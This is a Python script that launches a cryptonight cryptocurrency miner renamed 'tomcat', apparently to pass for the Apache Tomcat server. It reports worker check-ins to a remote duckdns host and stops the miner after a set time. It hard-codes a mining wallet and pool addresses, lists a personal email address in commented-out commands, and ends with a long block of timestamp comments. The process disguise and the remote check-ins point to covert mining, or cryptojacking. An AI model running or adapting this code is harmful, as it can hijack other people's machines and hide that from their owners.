import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:39:05.285521
#2018-02-17 17:27:03.783996
#2018-02-17 19:16:06.735080
#2018-02-17 21:07:05.970366
#2018-02-17 22:51:01.902620
#2018-02-18 00:35:09.715812
#2018-02-18 02:27:05.593769
#2018-02-18 04:13:07.213542
#2018-02-18 06:05:07.448342
#2018-02-18 07:55:07.254246
#2018-02-18 09:42:06.324039
#2018-02-18 11:27:02.168895
#2018-02-18 13:13:05.461638
#2018-02-18 15:02:06.181142
#2018-02-18 16:50:08.347552
#2018-02-18 18:38:01.368653
#2018-02-18 20:26:01.776478
#2018-02-18 22:12:06.682878
#2018-02-19 00:01:07.585502
#2018-02-19 01:47:03.848409
#2018-02-19 03:36:01.537006
#2018-02-19 05:21:06.452972
#2018-02-19 07:09:04.316753
#2018-02-19 08:58:04.621128
#2018-02-19 10:47:05.422382
#2018-02-19 12:34:09.800296
#2018-02-19 14:23:06.640512
#2018-02-19 16:12:01.748716
#2018-02-19 18:00:05.947439
#2018-02-19 19:46:08.757481
#2018-02-19 21:33:07.765800
#2018-02-19 23:19:05.656057
#2018-02-20 01:05:01.851361
#2018-02-20 02:55:01.300040
#2018-02-20 04:42:05.196255
#2018-02-20 06:26:02.243967
#2018-02-20 08:11:03.993880
#2018-02-20 09:56:07.002173
#2018-02-20 11:39:08.748945
#2018-02-20 13:26:08.716805
#2018-02-20 15:12:04.680875
#2018-02-20 16:56:04.521111
#2018-02-20 18:44:05.060822
#2018-02-20 20:36:01.357285
#2018-02-20 22:20:07.939698
#2018-02-21 00:01:06.666254
#2018-02-21 01:47:05.376783
#2018-02-21 03:36:01.833875
#2018-02-21 05:24:06.846365
#2018-02-21 07:11:07.204941
#2018-02-21 08:58:05.654584
#2018-02-21 10:47:01.598442
#2018-02-21 12:35:09.466761
#2018-02-21 14:23:02.212975
#2018-02-21 16:10:01.655323
#2018-02-21 18:02:06.336460
#2018-02-21 19:49:01.987016
#2018-02-21 21:35:06.477687
#2018-02-21 23:21:05.655349
#2018-02-22 01:10:01.318402
#2018-02-22 02:56:06.228157
#2018-02-22 04:43:01.347131
#2018-02-22 06:27:06.610240
#2018-02-22 08:13:06.373126
#2018-02-22 10:01:07.156740
#2018-02-22 11:45:03.290627
#2018-02-22 13:31:08.710180
#2018-02-22 15:20:09.394627
#2018-02-22 17:05:08.020419
#2018-02-22 18:51:12.242725
#2018-02-22 20:43:05.364311
#2018-02-22 22:29:04.061378
#2018-02-23 00:14:07.995560
#2018-02-23 02:02:07.057015
#2018-02-23 03:51:05.869665
#2018-02-23 05:32:04.918610
#2018-02-23 07:16:05.532102
#2018-02-23 09:21:07.097771
#2018-02-23 11:28:05.571956
#2018-02-23 13:19:05.539366
#2018-02-23 15:04:07.323008
#2018-02-23 16:53:07.465390
#2018-02-23 18:39:08.098270
#2018-02-23 20:26:06.098443
#2018-02-23 22:13:02.216155
#2018-02-23 23:59:06.432980
#2018-02-24 01:50:08.528357
#2018-02-24 03:43:03.223247
#2018-02-24 05:32:04.326967
#2018-02-24 07:18:02.245101
#2018-02-24 09:08:02.074068
#2018-02-24 10:45:01.811253
#2018-02-24 12:32:06.302120
#2018-02-24 14:09:06.010366
#2018-02-24 15:44:03.712345
#2018-02-24 17:21:07.032553
#2018-02-24 18:52:01.738610
#2018-02-24 20:23:04.939981
#2018-02-24 21:54:02.203834
#2018-02-25 00:37:06.790628
#2018-02-25 02:40:03.841709
#2018-02-25 06:29:03.681976